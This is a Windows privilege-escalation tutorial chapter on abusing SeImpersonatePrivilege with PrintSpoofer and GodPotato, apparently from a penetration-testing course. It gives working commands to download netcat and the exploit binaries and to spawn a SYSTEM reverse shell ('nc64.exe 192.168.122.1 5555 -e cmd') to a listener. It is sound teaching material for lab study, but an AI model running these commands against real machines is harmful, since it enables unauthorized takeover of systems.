# 4 - SeImpersonatePrivilege Exploitation

#### Topics <a href="#topics" id="topics"></a>

> 1. Introduction to the Windows Shells
> 2. Windows Permissions
> 3. Reverse Shells in Windows
> 4. SeImpersonatePrivilege Exploitation
> 5. On Cross Compilation
> 6. Windows Services
> 7. Weak Service Permissions
> 8. Unquoted Service Path
> 9. DLL Hijacking
> 10. Always Install Elevated
> 11. Files with Sensitive Data
> 12. Windows Hashes
> 13. Stored Credentials and the Windows Vault
> 14. Scheduled Task
> 15. Critical Registry Paths
> 16. Useful Tools
> 17. AMSI Bypass

## **What is** [**SeImpersonatePrivilege**](https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/seimpersonateprivilege-secreateglobalprivilege)**?**

The `SeImpersonatePrivilege`, or "Impersonate a client after authentication," is a user right in Windows that allows programs running on behalf of a user to impersonate another client.

This privilege is primarily used in client-server scenarios, enabling a server process to impersonate the client process to perform tasks on its behalf.

### **Security Implications**

If an attacker has the `SeImpersonatePrivilege`, they can:

* Create a service to trick clients into connecting to it.
* Impersonate the connected client’s privileges, potentially escalating their own access to SYSTEM.\
  This makes `SeImpersonatePrivilege` a common target in privilege escalation attacks.

***

### **Checking for SeImpersonatePrivilege**

To verify whether the current user has this privilege, run the following:

```bash
whoami /priv
```

**Sample Output**

```bash
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
```

If the `SeImpersonatePrivilege` is enabled, the user can exploit it for privilege escalation using tools like **PrintSpoofer** or **GodPotato**.

***

### **Assigning SeImpersonatePrivilege**

If you want to assign the `SeImpersonatePrivilege` to a user:

1. Open the **Local Group Policy Editor**:
   * Navigate to:\
     `Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment`.
   * Locate *"Impersonate a client after authentication."*
2. Right-click and select **Properties**, then click **Add User or Group**.

***

## **Privilege Escalation with SeImpersonatePrivilege**

### **Initial Setup**

1. **Start a Listener on the Attacker Machine**

   ```bash
   nc -lvnp 5555
   ```
2. **Download Netcat on the Victim Machine**

   ```powershell
   iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -Outfile nc64.exe
   ```

***

### **Exploiting with PrintSpoofer**

**PrintSpoofer** leverages misconfigured print spooler services to escalate privileges to SYSTEM.

1. **Download the Exploit**

   ```powershell
   iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe
   ```
2. **Execute the Exploit**\
   Run the following command to establish a SYSTEM shell:

   ```powershell
   PrintSpoofer64.exe -c "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
   ```

***

### **Exploiting with GodPotato**

**GodPotato** is a tool that exploits COM and DCOM misconfigurations to achieve SYSTEM privileges.

1. **Identify .NET Framework Version**\
   Use the following command to determine the .NET version installed:

   ```powershell
   reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
   ```
2. **Download the Appropriate GodPotato Version**\
   Depending on the .NET version:
   * **.NET 2.0**:

     ```powershell
     iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe
     ```
   * **.NET 3.5**:

     ```powershell
     iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe" -Outfile GodPotato-NET35.exe
     ```
   * **.NET 4.0**:

     ```powershell
     iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe" -Outfile GodPotato-NET4.exe
     ```
3. **Execute the Exploit**\
   Use the appropriate executable to escalate privileges and spawn a reverse shell:

   ```powershell
   .\GodPotato-NET2.exe -cmd "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
   ```

***

## **Other Resources**

* [SeImpersonatePrivilege - Microsoft Doc](https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/seimpersonateprivilege-secreateglobalprivilege)
* [Juggernaut Security](https://juggernaut-sec.com/seimpersonateprivilege/)
* [FoxGlove Security](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
* [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)
* [GodPotato](https://github.com/BeichenDream/GodPotato)

{% hint style="danger" %}
**Disclaimer**

**❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!**❗
{% endhint %}